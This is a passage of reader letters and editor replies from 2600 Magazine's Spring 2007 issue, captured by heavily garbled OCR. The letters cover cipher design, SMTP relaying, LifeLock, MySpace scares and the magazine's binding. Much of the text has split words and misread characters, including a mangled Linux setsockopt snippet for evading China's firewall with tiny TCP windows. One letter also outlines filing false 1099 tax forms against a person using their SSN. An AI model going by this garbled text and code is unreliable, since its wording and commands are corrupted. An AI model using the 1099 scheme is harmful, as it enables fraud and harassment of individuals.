enter a non-zero quant i ty i n the form nf a j avascri pt
var i abl e or Paypal refuses to cdrry out the transac
ti nn. However, $0. 01 i s enough to sati sfy i t.
\8/
Dear 2600:
Thi s i s di rected towards Dal e Thorn regardi ng hi s
arti cl e "Al gori thmi c Encrypti on Wi thout Math. "
I t ' s good that you ' ve taken an i nterest i n cryptog
raphy and I hope you wi l l conti nue and l earn. Wi th
that i n mi nd, t hi s i s not i ntended as an attack. I too
i nvented " hri l l i ant" encrypti on schemes in my youth
onl y to eventual l y l earn that good encrypti on i s
hard for a reason. I ' m not an encrypti on expert, but
someone l i ke Bruce Schnei er i s u n l i kel y to respond
to you because he' s seen these cl assi c mi stakes a
gazi l l i on t i mes, so you ' re stuck wi th me.
I ' m worki ng from you r descr i pti on, rather than
vour code. Let ' s see, where to begi n?

One Ti me Pads ( OTP) are consi dered unbreak
abl e because there i s no determi nabl e rel ati onshi p
between t he cl ear text and t he ci pher text as l ong
as i t ' s only used once. Hence, One Ti me Pad. The
reason one t i me pads are not commonl y used i s that
the pad must be securel v del i vered through sepa
rate channel s. Thi s can be a PI TA. Your approach
of generati ng a pseudo random transpos i ti on array
requ i res that the reci pi ent al so have the array vi a
s i mi l ar PI TA channel s, pl us by usi ng i t more t han
once, you negate i ts potenti al val ue as a One Ti me
Pad. Al l pai n, no gai n !
Your reference t o usi ng other parameters, such RS
fi l enames, to foi l predi ctabi l i ty i s good. Thi s i s cal l ed
a " sal t . " The purpose of a sal t i s to defeat " Rai nbow
Tabl es. " Wi thout a sal t, one can pre-generate bi l l i ons
of poss i bl e cl ear text t o encrypted text rel ati onshi ps
i n advance over a peri od of mont hs or years so
t hat when vou need t o actual l y br eak a message, a
si mpl e l ookup i nto your Rai nbow Tabl e can break
i t i n seconds because the brute force was al ready
done in advance. Even with a sal t. i t has to be done
ri ght to be ful l y effecti ve. Mi crosoft got i t wrong wi t h
thei r Offi ce l i ne, so you ' re i n good company. Last
but not l east on the subj ect of sal t, the secur i ty i t
br i ngs i s stri ctl y ai med at Rai nbow Tabl es . I t does not
add to the effecti ve key space, i . e. , make encrypti on
Page 40 2600 Magazine
stronger, because by its nature the sal t is a known
and knowabl e val ue.
Now to the heart of your approach: You ' ve
defi ned a transposi ti on functi on vi a your pseudo
random array such that:
CLEARTEXT_A -> TRANSPOSITION_l ->
Let ' s sti ck wi th i n upper case Engl i sh for ease of
di scussi on. 50 you may have somet hi ng l i ke t hi s:
"A" ->TRANSPOSITION_l -> "X"
->TRANSPOSITION 1 -> "N"
Thi s is a val i d encrypti
;
n scheme. It even has a
name. I t ' s cal l ed a Caesar ci pher. It dates back to
at least the t i me of J ul i us Caesar and is what most
puzzl e books use for fun these days. Now to be fai r,
you can work i n a l arger space than A to Z, but that ' s
a si mpl e l i near growth that wi l l make i t awkward for
humans wi th penci l and paper, but i s n' t a si gni fi cant
key space di fference.
Your next addi ti on i s to support mul t i pl e l evel
encrypted encrypti ons wi th TRANSPOSITION_2,
TRANSPOSITION 3 , TRANSPOSITION
n. You state that i
I
s necessary to know each tran
S:
posi ti on (password O passnumber) and the order
they were used so that it can be reversed. That' s
i ncorrect as far as t he attacker i s concerned. You use
thi s i nformati on as a strai ghtforward way to reverse
your al gori thm and decrypt. However, the attacker
coul d care l ess about your passwords and order. He
onl y needs to break the ci pher, and that ' s not the
same thi ng!
The reason i s because there exi sts a TRANS
POSITION _x that is the resul t of al l of your previ
ousl y appl i ed transposi ti ons. I n mathemat i cal terms,
t hi s i s cal l ed a group. The net effect i s that mul t i pl e
l evel encrypti ons i n your techni que add absol utel y
nothi ng to the encrypt i on secur i ty.
Let ' s conti nue the above exampl e by r unni ng i t
t hrough two more l ayers of your encrypt i on.
Pssword 2
"X" ->TRANSPOSITION_ 2 ->
_

_
"N" ->TRANSPOSITION_ 2 ->
,
_
,
Pssword 3
::
_
->TRANSPOSITION_ 3 -> " M"

_
,
->TRANSPOSITION_ 3 -> " G"
Now where you woul d reverse " M" to " F" to
" X" to get "A" because you know the sequence and
the keys, as the attacker, I ' m left wi th the fol l owi ng
puzzl e:
"A" ->TRANSPOSITION_x -> " M"
->TRANSPOSITION x -> " G"
Thi s is the same Caes
;
r ci pher as before! The
transposi ti on array i s unknown, but i t was unknown
before so mul t i pl e encrypti ons added nothi ng to the
secur i ty. I t' s sti l l j ust a Caesar ci pher! By breaki ng i t,
I i mpl i ci t l y produce the TRANSPOSITION_x array
that you never actual l y used, but is the mathemat i cal
equi val ent of your n- I evel encrypt i ons, but a I I i n one
step.
Agai n, pl ease don' t take th i s as an attack. I ' ve
l ost track of the number of t hi ngs I ' ve i nvented onl y
t o di scover I ' d been beaten t o i t, someti mes by
hundreds of years. Learn and get better.
Dave
Dear 2600:
I woul d l i ke to add another techni que to Toka
chu' s art i cl e "The Not-So-Great Fi rewal l of Chi na. "
Thi s i s a techni cal sol ut i on whi ch shou l d work for
a l l network connecti ons. I t al so does n' t requi re any
modi fi cati on of the TCPfl P software on the other
end of the l i n k, nor does i t requi re any thought from
the user once i t ' s set up. Si nce the Chi nese fi rewal l
i s compl etel y statel ess, i t won' t catch a "forbi dden
word" whi ch i s spl i t across mul t i pl e packets. The
most rel i abl e way to do thi s i s to make your data
packets real l y, real l y smal l . To make the remote
computer send smal l TCP segments, tel l your kernel
to adverti se a smal l wi ndow. On L i nux, for exampl e,
t hi s can be done wi th setsockopt (socket,
getprotobyname("tcp")->pyroto, TCP_
WINDOW_CLAMP, &winsize, sizeof(int
where wi nsi ze is an i nteger vari abl e ( not a constant ! )
contai ni ng t he wi ndow si ze whi ch you want to
adverti se, in bytes. The tcp( 7) manpage says that
"the [ L i nux] kernel i mposes a mi ni mum [wi ndow]
s i ze of 50CK_MI N_RCVBUFf2", defi ned to be 256
i n -kernel fi ncl udefnetfsock. h. I n any case, changi ng
that l i ne from 256 to 2 shoul d be suffi ci ent.
The most effi ci ent strategy i s to advert i se a
wi ndow one byte l ess than the shortest forbi dden
str i ng you pl an on usi ng. Of course, usi ng a r i di cu
l ousl y smal l wi ndow s i ze comes wi th some penal
t i es . Each fi ve ( or whatever) bytes of data wi l l come
wi th i ts own I P header ( 24 bytes) and TCP header
( 24 bytes) . Furt her, every such segment must be
acknowl edged by the recei vi ng end before the
sender i s al l owed to send any more data, creat i ng a
round-tri p del ay. Ass umi ng a wi ndow of fi ve bytes,
t hi s i nfl ates a t hree ki l obyte ( 3072 byte) transmi ssi on
i nto 61 5 rou nd tri ps, requi r i ng the sender to transmi t
32, 592 bytes and the recei ver to transmi t 2 9, 520
bytes of acknowl edgments, not i ncl udi ng i n i t i al and
fi nal handshaki ng ( 5YNfFI N) . The l argest penal ty,
however, comes from the over 600 round tri p t i mes
that have to pass for the transfer to compl ete, a s l i ght
i ncrease over the l ess than ten round tri ps whi ch
woul d be requi red for the same transmi ssi on usi ng
l arger ( - 1 024 byte) segments.
I woul d al so l i ke to s hi l l for the Museum of
Communi cati ons (http:/ /www. museumofcom
munications. org/, +1 206 767 301 2) i n Seatt l e.
They have what i s probabl y the best col l ecti on of
t el ephone equ i pment i n the wor l d. I t ' s al so one of
the best pl aces to bl ue box - the docents most l i kel y
won ' t obj ect, so l ong as you don' t break anythi ng.
They' d probabl y even be gl ad to hel p you, though
don ' t expect to be abl e to di al outsi de. I f you ask
ni cel y you can read t hei r amazi ngl y comprehen
s i ve l i brary of Bel l System Practi ces. They' ve got
mul t i pl e swi tches: a Number 1 Crossbar, a Number
5 Crossbar, a margi nal l y functi oni ng Number 3 E55,
and a rare Pnel swi tch.
Duncan Smith
Spring 2007Pge 41
Dear 2600:
" How to Get Around Cabi e/DSL Lockdowns" i n
2 3 : 4 i s most l y on the ri ght track - you can i ndeed
send SMTP from your I SP- hosted e-mai l account
t hrough your home machi ne whi l e on the roam
us i ng the method descri bed (for most cabl e/DSL
provi ders). You may even have good resu l ts i n the
short term. However, I woul dn' t recommend i t as a
rel i abl e l ong-term method for three reasons:
1 ) Whi l e i t' s true that many I SPs bl ock i nbound
connect i ons to port 25 of t hei r dynami c subscri ber
I P pool , i t ' s al so true that ( i ncreasi ngl y) many of
them al so bl ock outbound connecti ons from t hei r
dynami c I P pool to port 25 of remote hosts other
t han the I SP' s SMTP servers. What that means i s that
your home SMTP server may or may not be abl e to
del i ver mai l to remote hosts, dependi ng on whether
your I SP bl ocks those outbound connect i ons. Thi s
i s n ' t because your I S P i s r u n by total i tari an bastards
( al though i t may be); they' re tryi ng to keep spam
bats from us i ng t hei r (and your) bandwi dth. Thank
t hem for t hi s .
2) Most of t he major s pam fi l ters out there ( e. g. ,
SpamAssassi n) wi l l assi gn a much h i gher score to
any message rel ayed from a dynami c I P address.
Most di st r i buted spambot networks are runni ng on
unsecured home computers wi t h dynami c I Ps. What
that means i s that even i f you thi nk your message
has been del i vered, the recei ver ' s spam fi l ter may
have dropped i t on the fl oor because of the ori gi
nat i ng I P address. (Thi s i s true even i f you ' re usi ng a
dynami c DNS server to gi ve yoursel f a t i dy-l ooki ng
A record. )
3) On a rel ated note, i f you ' re sendi ng from
youraddress@exampl e. org and exampl e. org has a
regi stered SPF record i n DNS, your odds of gett i ng
through spam f i l ters are di mi ni shed sti l l further.
As an exampl e, ADELPHI A. NET has SPF set up as
fol l ows:
5 dig adelphia. net txt
;; ANSWER SECTION:
adelphia. net. 41456 IN TXT " v=spfl
-ip4:68.168.78.0/24 ip4:68.168.75.
-0/24 -all "
What that means is that if you aren ' t i n one of the
two I P bl ocks l i sted above, you aren ' t authori zed to
send mai l from *@adel phi a. net, and any spam fi l ter
that checks SPF (whi ch i s i ncreasi ngl y common) i s
more l i kel y to score your message as spam. ( Sadl y,
Comcast j ust bought Adel phi a, and it seems they
ei ther haven' t heard of SPF yet or they can' t keep
track of t hei r acqui s i t i ons fast enough to be bothered
to keep an up-to-date SPF record for COM CAST.
NET. See "total i tari an bastards" above. )
What to do? One of two t hi ngs:
| ) Confi gure your SMTP server to use one of your
I SI s SMTP servers as a smart host. ( I n your Mi crosoft
SMTP setup, go u nder Delivery > Advanced
and enter your cabl e/DSL provi der ' s SMTP server as
your smart host. Do not check the box to attempt
di rect del i very fi rs! . ) You ' l l t hen be rel ayi ng through
your I SP' s mai l system and won' t need to worry
about any of the t hree t hi ngs above.
2) Scrap the whol e scheme and connect to your
I SP' s webmai l servi ce over HTTPS. That ' s why i t ' s
there.
L i ve l ong and hack on.
McViking
This raises a point among those of you who send
us email from wacky places. Please be sure 0 not do
something that ' likely to anger a spam flter because
there's often little way for us to detect it. That means
avoiding the above, not using spam-like phrases
( "make money fast! "), or sending weird attachments
with no corresponding text.
Dear 2600:
I was ki nd of di sappoi nted that I sent you a
hi gh resol ut i on pi ct ure of a payphone i n Queens,
New York and haven't even recei ved any type of
response.
Troy
We've been meaning to set up an auto-responder
on the payphones@260U. com address to acknowl
edge receipt of submissions. But you should also
know that we're looking for foreign payphones and,
although Queens is the most multicultural county in
all of the United States, it doesn't qualify as foreign.
And there is certainly nothing exotic or mysterious
about Verizon.
Gratitude
Dear 2600:
As a |i stener to Of The Hook and subscri ber to
2600, I ' ve been aware for a l ong t i me of how hel pful
you fol ks are. Recent l y I found another exampl e
whi l e l ooki ng at the web page of my gi rl fri end' s
col l ege:
" Need some assistance even quicker? Then you
can call the Help Desk at extension 2600 from on
campus, or from off campus at /d00) xxx-xxxx, X
2600. "
Gl ad you ' re there to hel p her out !
Barry
It would be fun to gather a list of the various
offices/people that diferent extension 26005
connect to in various places. More fun if we can
inspire people in charge to always assign that exten
sion to something interesting.
Dear 2600:
| am a 1 5-year-ol d sophomore h i gh school
student. I am a very fai thfu l and l oyal reader of 2600
and I woul d l i ke to l et you know some thi ngs that
your magazi ne has accompl i shed i n my l i fe. When
| was about 1 . years ol d my father came to me and
sai d somet hi ng al ong the l i nes of "Al ex' I found
a ' hacker' magazi ne at Borders whi l e l ooki ng at
s ome PC ones . I know you ' re i nterested i n that ki nd
of stuff so I got i t for you - here. " I was absol utel y
t hr i l l ed t o actual l y see a magazi ne about my mai n
i nterest. Si nce then, your magazi ne has never fai l ed
to i nspi re and moti vate me. For exampl e, | started to
t i nker wi t h el ectroni c devi ces and use packet s ni ffers
Page 42
2600 Magazine
to get a better understandi ng of how I nternet i nterac
t i on rea l l y works - a l l at the age of 1 4. I have gone so
far between these two to three years that I ' m amazed
that i t even happened. Si nce the 2600 wri ters
usua l l y use techn i cal l anguage to such a degree, i t
forces you to di g i n and fi nd out what they rea l l y
mean. Thi s is exactl y what I di d and it turned out
to be a l i ttl e humorous because your magazi ne was
a bi t too advanced for a 1 4-year-ol d to understand.
I constantl y read books and art i cl es on computers
and, more speci fi cal l y, hardware, networki ng, proto
col s, packets, l ockpi cki ng, red boxi ng, etc. I t has j ust
been such an extraordi nary j ourney these years that
I fel t compel l ed to wri te a l etter to you guys prai s i ng
your efforts for freedom of the mi nd and i ndi vi dual ,
pri vacy, and how we shoul d never stop our thi rst
for knowl edge and our cur i osi ty about the worl d
i n general . I have l earned much s i nce my fi rst copy
and I wanted to tel l you guys to not stop whatever
you are doi ng. And yes, I do real i ze the hardshi ps
we are goi ng through today concerni ng the absol ute
paranoi a and abusi veness of the general publ i c and
the government themsel ves about the mer e word
" hacker. " So, a l l i n a l l , t hank you guys for doi ng such
a great j ob and keep i t real .
Tr4/\!ce
And after reading all of the various horror stories
involving parents, you must realize that you're quite
lucky to have a father who supports your curiosity
We spend a lot of time pointing out the bad things
around us so it's especially important to acknowl
edge the exceptions.
Thoughts
Dear 2600:
I ' ve been readi ng your j our nal for about two
years. I am not a hacker, but probabl y cou l d be wi t h
some spare t i me and the ri ght resources.
My i nterest is mai nl y i n the phi l osophy of 2600
and i ts concern wi th pri vacy, computer users' ri ghts,
and the corporate mach i nes that i nvade pri vacy
us i ng servi ces as a l ure to l og onto domai ns. Thi rd
party tracki ng i s, i n my book, corporate hacki ng of
my personal computer. I f I were doi ng the same to
Googl e as they appear to have the ri ght to do to me,
I woul d i n a l l probabi l i ty be arrested. As a resu l t, I
i gnore whatever they spew at me as far as market i ng
goes, part l y because I ' m vi ndi ct i ve, but more i mpor
tantl y because it i s n' t rel evant to al l my part i cul ar
ci rcumstances. Thus, I bel i eve, the des i re t o create
the bi g new crystal bal l is a profoundl y fool i s h
i dea, and t he l osers ar e smal l onl i ne retai l ers and
l ocal servi ces who thi n k Googl e i s hel pi ng. But i s
i t real l v?
W hear so much di s i nformati on about every
t hi ng that market i ng i nformati on about market i ng i s
merel y propaganda. My predi ct i on: onl i ne retai l wi l l
bui l d, but wi l l al so destroy, sectors of t he economy.
Is there a depressi on l oomi ng?
skoobedy
Dear 2600:
Fi rst, l et me get my nose brown here by sayi ng
your magazi ne i s excel l ent.
Now that that' s out of the way, I ' m a 44-year
ol d mal e who di d phreak back i n the 1 980s ( usi ng
950 numbers t o cal l l ong di stance BBSes) so I ' m
not squeaky cl ean here, bu t that was a youthful
di gressi on.
Havi ng sai d that, I feel you ar e hypocri tes. I ' l l
expl ai n: You say that hacki ng (or us i ng vul nerabi l i
t i es) i n t he system shoul dn' t be for gai n . But i n 23 : 2,
you pri nted a l etter from Zen master who wanted
to know how to "hack i nto ' Fastpass ' machi nes"
at Di sney Wor l d. Yet, two pages before, you had a
l etter from Jeff who was repl yi ng to an ear l i er l etter
to Jack whose father woul dn' t l et h i m s ubscri be to
2600 because of the word " hacki ng. " Jeff sai d to let
Jack' s father read the magazi ne. I f I was J ack' s father
and saw the l etter from Zenmaster, that woul d rei n
force my bel i efs about hacki ng, thereby perpetuat i ng
the myth about hackers bei ng bad peopl e. There are
a l ot of cl osed mi nds out there. We need to open
them, not add dead bol ts.
Computer Bandit
You generally don't open closed minds by keeping
your mouth shut. And it would be wrong for us to
restrict knowledge and tell people not to ask certain
questions because there was no seemingly legitimate
reason for asking. As far as we're concerned, there
is always a legitimate reason: curiosity. And while
we're not kidding ourselves into believing that there
aren't lots of people with ulterior motives who could
also benefit from such knowledge, if we help others
learn how things work we're doing what we set out
to do. Some parents get that. Many sadly don't. But
we can't change who we are in order to appeal to
people who don't like who we are. There's too much
of that in our culture already.
Dear 2600:
For severa | months now, a company has been
r unni ng radi o advert i sements for thei r I denti ty Theft
Protect i on Servi ce (http://w. lifelock .
com). Presumabl y they contact the maj or credi t
bureaus and pl ace a cal l fi rst l ock on obtai ni ng
any new credi t. Thi s is a l l fi ne and dandy. As far as
I know you Can contact them yoursel f and do the
same wi thout trust i ng some t hi rd party company to
protect your personal i nformati on.
The commerci al has some dude sayi ng: "My
name i s Bl ah Bl ah and my SSN i s 1 23-45-6789 . . . "
and goes on to have a test i moni al from another
stdt i ng that they di d not t hi nk t he servi ce woul d
amount t o anyth i ng when one ni ght they got a cal l
aski ng i f they were appl yi ng for credi t somepl ace . . . .
The probl em I see i s that obtai ni ng credi t i s not
the onl y reason someone woul d want your i den
ti ty. What about peopl e seeki ng empl oyment under
assumed names? As | see i t nobody puts a l ock on
what i s reported to the I RS and Soci al Securi ty.
Presumabl y those agenci es can detect fraud by
not i ci ng the fi l i ngs are ei ther somehow i ncorrect
Spring 2007Page 43
where the name does not match the SSN and/or the
address i s di fferent. But what about i ntenti onal acts
i ntended to attack the i ndi vi dua l ? Let ' s say someone
l ooks up the dude' s address and veri fi es the name
and SSN match thi s guy, uses a val i d taxpayer | O
number for, l et's say thei r l east l oved company ( i . e. ,
Wal mart), and fi l es a 1 099 to the I RS, state treasury,
and hi s actual res i dence. How i s t hi s guy and the
target company goi ng to prove thi s i s an i ncorrect
fi l i ng? How woul d you feel i f you recei ved a 1 099
that does not wi thhol d any taxes stat i ng that you had
earned $20 mi l l i on t hi s past year contract i ng for a
company you di dn ' t ?
What a mess !
Exo
We'll likely get a whole lot of mail from accoun
tants who will explain how this all works. We find the
LifeLock approach interesting. On their website, the
CEO of the company posts his real Social Security
Number as proof of how secure he feels with their
product. It almost sounds like a challenge . . . .
Dear 2600:
Thi s is a response to anybody out there who
thi nks that hacki ng MySpace is a worthy past i me.
I ask what purpose i s there i n t hi s? There i sn' t any
usefu l knowl edge to be gai ned. As far as I can tel l ,
t he onl y i nformati on about me t hat can be gl eaned
by gett i ng my password i s maybe a password. No
SSN, no f i nanci al credi t. And al so, why ar e they
us i ng the portal pages? That was somet hi ng I thought
about doi ng a l ong t i me ago when I di dn' t know
what ethi cal hacki ng was, or was j ust bored. I f
peopl e wanted to know more about MySpace, then
do i t i n a manner that does n' t bl oat my bul l et i ns wi th
S i l l y posts about free ri ngtones. My two cents.
psion
Anytime someone says there isn't worthwhile
information to be found in pursuing something,
someone else always manages to come along and
prove them wrong. The fact is that any bit of infor
mation we give up about ourselves is potentially a
gateway to a whole lot of other information. That '
why protecting anything that' private i s so important
and if there' a way of defeating this on any level, we
need to know about it.
Dear 2600:
I recentl y saw the fol l owi ng posted i n MySpace:
" I just posted a bulletin about hackers hiding in
our pictures. I followed the directions in the bulletin
and found one picture that I had to delete. Here's the
deal: Hackers are getting into our picture galleries
and posting inappropriate pics behind our original
pics. To fnd out if this happened to you, follow these
steps:
Go to Edit profile. On the right hand side near
the top, you have the option to view profile, etc.
Click "Safe Edit Mode. " Then click Images. If you see
your caption, but a different picture, that pic needs
to be deleted. To delete it, go to your home page.
Click add/edit photos. Then delete the picture with
the caption that had the wrong pic. When you're in
add/delete pics, the pic you uploaded will show. It
still needs to get deleted. The hacker has their pic
hiding behind your original picture. Tricky IiI people,
eh! ?
I f only these people could use their smarts for
good!! This world would be a happier place.
You should probably change your password after
you delete the pics, just to be on the safe side. "
Okay, I have seen t hi s mental i ty for qui te some
ti me now havi ng been i nto computer secur i ty for a
whi l e . . . the way that the " hacker" has become some
t hi ng of the ghost of a monster, l ur ki ng i n the "back
al l eys" of the I nternet, wai t i ng to take your soul to
I nternet hel l . I t i s regrettabl e that the medi a portrays
t hi s i mage and that a l l of us have j ust bought i t
wi thout questi on, even when some of these same
peopl e that buy the i mage of the evil hacker pose
as the open-mi nded and "watchers of the watchers, "
so to speak.
The name of t he hacker has been bastardi zed
from so many angl es, yet the ori gi nal i ntenti on of
"hacki ng" was to i mprove secur i ty by exploring
vulnerabilities and i nformi ng those i n charge of our
secur i ty about these vul nerabi l i ti es. Granted, any
knowl edge can be taken for i l l purposes but that
does n' t mean that we shoul d abandon expl orat i on
for the sake of some strange "safety."
Perhaps these bul l et i ns coul d j ust as eas i l y
have repl aced t he word "hacker" wi t h "vandal " or
"thi ef" and t he message wou l d contextual l y remai n
the same. Bu t I s uppose that by now the meani ng
of t he word has been changed by our medi a (that
i nCi dental l y wi l l vi l i fy anythi ng wi th a margi nal
voi ce t o obtai n rati ngs, equal i ng ad dol l ars) . Fi rst
i t was "wi tches," then "Turks" or "Jews," after that
"communi sts" and "gays," and now "hackers" and
"terror i sts. "
Maybe you coul d read up for the hour that i t
woul d take you t o understand the most s i mpl e of
secur i ty concepts t hat you coul d use to hel p protect
yoursel f, i nstead of l i vi ng in fear of some i ntangi bl e
threat t hat al most al ways i s some young teenage
ki d who s i mpl y wants to have a l i ttl e fun and cause
some mi schi ef. Ki ds have been doi ng that ever s i nce
humans have |i ved i n a soci ety.
Rev. Troy (SubGeni us)
More so than an actual person engaging in
mischief is the mere specter of someone engaging in
behavior that our shrill-voiced minders convince us
is cause for panic. In other words, we literally obsess
over scenarios that aren't playing out but which one
day in a worst
-
case scenario might.
It doesn't matter what story the media is
reporting. If it has anything to do with computers,
phones, credit cards, or technology in any sense,
hackers will be the ones seen as the threat. Never
mind that a bank has taken your private informa
tion and passed it around to all sorts of other enti
ties without your permission. Never mind that they
do this to millions of people every day And never
mind that they don't even bother to secure this
Pge 44 2600 Magazine
information properly and always wind up losing it
or putting it in places where it becomes accessible to
the entire world. All of that is irrelevant compared to
the possibility that "hackers " will find this infO! ma
lion and use it to make your h miserable. /Iackers
become the threat and the real guilty parties get |o
walk awa), and do the same things over and over.
Most pfple understand this absurdity It' s our job
to see that the media gfs it too. Whcnevc'r such a
story gets reported, those spreading it around need
to hear hom us letting them know in no uncertain
terms that hackers are not the problem and, in many
cases, they are the solution. (on't give in to their
sloppy journalism by conceding their misuse of the
word and renaming ),ourse!f as something Lse. That
doesn't solve anything and evmtually the)" 11 just
misuse on
)
other words we come up with owell. It"
a frustating /ttle to be sure, but it:s most certainl),
not a lost cause.
Incidentallv we don't believe the word "terrorist "
has ever meant mmething non
-
evil. unlike all ,our
other examples. That word, however, is being used
far too commonly to describe Ihings that barely
would have attracted any attention in the past and
which continue to cause no harm tocay
The Format
Dear 2600:
Regardi ng the l atest format, here are some
reasons why I don ' t l i ke i t:
1 ) Paper s mel l s bad. When I ' ve opened previ ous
i ssues, there has been a noti ceabl e absence i n t he
aroma department. The current i ssue (2 3 : 4) smel l s
l i ke an ol d Xerox machi ne.
2) The paper has a bad gri tty feel i ng, k i nd of l i ke
when you make your own toot hpaste and forget to
mash up the cal ci um pi l l s enough. There' s a sandy
resi due that j ust does n' t feel ri ght.
3) I personal l y feel that the fol d- n-stapl e bi ndi ng
is better t han t he gl ued bi ndi ng. The stapl es wi l l
h ol d that sucker togPl her for a l ong l ong t i me. I n
the gl ued versi on, t h e pages wi l l fal l ou t when I
photocopy some of t he better i l l ustrat i ons!hacks!
how-to' s i nto my personal col l ect i on of DI Y art i
cl es . Al so, some of t he l etteri ng i s cl ose to t he spi ne
and can be annoyi ng to read.
I f you went to t hi s format due to costs, t hen I
woul d defi n i tel y read it t hi s way over not readi ng
anythi ng at al l . However, i f t hi s was j ust an experi
ment, I ' d l i ke to put i n my vote for " no" i f there are
actua l l y votes bei ng tal l i ed.
But, most of al l , thanks for al ways tryi ng to he
fresh and i nnovati ve.
Bri an Heagney
This is the first we're hearing that we had a non
offensive aroma. Knowing this now we will figure
out hm to get it back. We'll also find out if there
are any difert'nces in the actual paper used. As for
the binding, we've heard pros and cons on the new
st yle. We do know it won 't fall apart and t hat this
sWle is used by many publications. This is some
thing we don 't have a choice in as it' the only kind
of binding our new printer does.
Dear 2600:
Di d you try a new way of pr i nt i ng the magazi ne
wi t h t he Wi nter i ssue? Because I l i ked i t a l ot better
when you j ust stapl ed the pages of the magazi ne
together. I t was a l ot easi er t o get t he magazi ne to
l ay flat whi l e you were readi ng i t, whi ch is some
t hi ng t hat i s very i mportant i f you read whi l e you ' re
eati ng. Now, you have to practi cal l y tCir t hc pages
out i f you want them to l ay fl at. I f anyt hi ng, the
i nsi de page margi ns need to be extended about
hal f an i nch, because wi t h the magazi ne bound
l i ke t hi s, you can hardl y read t he text on t he i nsi de
edge of t he pages. But I wou l d say j ust go back t o
stapl i ng the pages, i t worked a l ot better.
Jef
We're aware of the problem with the margins
and we apologize for any hardship that may have
cauwe. As you can see, we've madf them a bit
wieler for this issue. This is part of the growing pains
involved when (r>'ing something new There were
others . .
Dear 2600:
I read in "Transi t i on" that a new company i s
pr i nt i ng t he magazi nes and I noti ced t hat i mme
ri atel y because the bi ndi ng had changed. But,
whatever i n k they are usi ng is maki ng its way to my
fi ngers more t han stayi ng on the magazi ne front!
back cover. It is l eavi ng my fi ngerpri nts for anyone
to admi re on whatever I touch. I l i ked readi ng your
magazi ne wi t hout havi ng t o feel i i ke I had been
processed at t he pol i ce stat i on when I ' m done
readi ng i t. Coul rl you tal k to the pr i nter about t hi s ?
Ar e there ot her pr i nters t o consi der?
I nked Fi ngers
Dear 2600:
Just wanted to cal l your attent i on to the bl ack
i nk used on t he cover of the Wi nter 2 006-2007
edi t i on of 26(( ' The i nk rubs off!
I got my subscr i pt i on in the mai l , opened i t, and
acci denta l l y l eft i t on t he counter after my l unch
break. My il atmate came by and t humbed t hrough
i t before I got back to i t . By then there were bl ack
fi ngerpri nts on a f ew pages. (At fi rst I thought i t was
a cl ever pr i nt i ng t r i ck anrl then I thought i t was
s l oppy work at the pr i nter. But no, soon I noti ced
my hands were t ur ni ng dark and the back cover
had some pl aces where the bl ack i n k was rubbed
away ( di d t hey pri nt i t wi th dry erase i nk? ! ) .
I went by and warned my l ocal s ma l l news
stand ( Newsl and) to put t hem i n pl asti c baggi es
( when they get thei r s hi pment i f i t has the same i n k
probl em) on t h e shel f t o keep peopl e from mess i ng
up t he covers ( maki ng t hem u nsel l abl e) . I ' m s ure
someone wi l l see t he baggi es and thi n k they are
Spring 2007Page 45
t ryi ng to rest r i ct readers ( l i ke how they bag porn) .
Adric
Let's just call that our special "fingerprint issue"
and not speak of it again.
Dear 2600:
I l ove t hi s zi ne and al l that comes with it. I
remember the fi rst t i me I j ust happened onto your
pages i n a bookstore. I have been engrossed ever
si nce. Thanks for the i nsi ght, the commentary, and
al l t hat you and the wri ters do.
I remember when Playboy l ost t hei r stapl e bi nder.
They too have been unstoppabl e ever si nce!
I roeB
Well then we're certainly heading down an inter
esting road.
Dear 2600:
I l i ke the new bi ndi ng your magazi ne has now. I
have a suggest i on though . It wou l d be n i ce to have
the vol ume and i ssue number on the spi ne. A cl ever
message or quote on the spi ne wou l d be a n i ce
touch al so.
Jason
We'll consider our options now that we've finally
grown a spine after 20 years.
Dear 2600:
Pl ease provi de an i ndex in the back of the maga
zi ne, or at the end of each art i cl e, of al l URL ' s whi ch
appear i n the art i cl es. Someti mes I read about a URL
and then I can ' t fi nd whi ch art i cl e i t was i n . You
cou l d even have the authors do the work for you as
part of the submi ssi on gui del i nes, i . e. , attach the l i st
at the bottom of every art i cl e.
J ust l ooki ng for a way t o expl ore more of t hi s
great wor l d you ' re creati ng. Th i s wou l d hel p make
it easi er.
Ian
This is a good idea, one which a number of our
writers already engage in. We'll encourage the rest
to follow suil.
Sales
Dear 2600:
Open i ng the Wi nter 2 00o200 i ssue and
readi ng the " Transi t i on" edi tor i al , I started th i nki ng
of ways to hel p out. Obvi ousl y I try and do my part
by subscr i bi ng, but that j ust makes me one of ( hope-
to i nterested parti es. They cou l d be gi ven out to
fri ends, fami l y, coworkers. Br i ng a stack to the l ocal
meet i ng and gi ve them out to anyone who has n' t
been abl e t o get t hei r copy, or any i nterested pass
ersby who wonder what we are about. I f we can
cl ear out every unsol d copy before the di stri butor/
retai l er can destroy them and charge 2600, then we
wi l l be both savi ng 2600 money and " spreadi ng the
word" to many more i ndi vi dual s.
I f t hi s date i s set by the retai l er rather t han 2600,
we a l l need to survey our l ocal booksel l ers and
newsstands and share t hi s data wi t h each other s o
we know when t o make our purchases. Obvi ousl y
we don ' t want to make i t more di ffi cul t to l ocate a
copy l ocal l y - onl y snatch up the spare copi es j ust
before destruct i on.
You say you exi st to serve us, your readers. For
that I t hank you. Pl ease l et us know what we can do
to hel p you accompl i sh t hi s.
sai boogu
That 's an incredibly generous idea on so many
levels. Thanks for suggesting it. As for on sale dates,
as of this issue we have finally attained a consistent
schedule which should be easy to remember. Each
new issue will be on sale on the "2600 Friday" (first
Friday of the month) following a season change.
5o anytime it' the first Friday of a new season, you
should be able to find the new issue at newsstands.
In other words, this issue will be on sale on Friday,
April 6 since that's the first Friday of the month
following the start of spring (and we assume the
previous issue will be taken of the shelves at around
this time) . The next issues will be on sale on July 6,
October . etc. We intend to do whatever it takes to
keep to this schedule.
Dear 2600:
Fi rst of al l , great magazi ne and keep up the good
wor k. I buy your magazi ne at my l ocal Barnes &
Nobl e here i n Or l and Prk, I l l i noi s. I was s ki mmi ng
through t he Wi nter 2 00o200i s s ue wh i l e wai t i ng i n
l i ne t o purchase and saw a back cover photo rel ated
to Barnes & Nobl e and deci ded to show the cash i er.
He sai d they have to enter D pri ce manual l y for
each and every magazi ne. Makes sense. I have al so
noti ced t hi s in the past, s i nce magazi nes can change
pri ces regul arl y ( i ncl udi ng th i s one wh i ch went up
t hi s i ssue) u n l i ke books whi ch have the same pr i ce
and don ' t go up each year or so.
CPeanutG
fu l l y) many thousands. So, l et's mu l t i pl y the efforts of
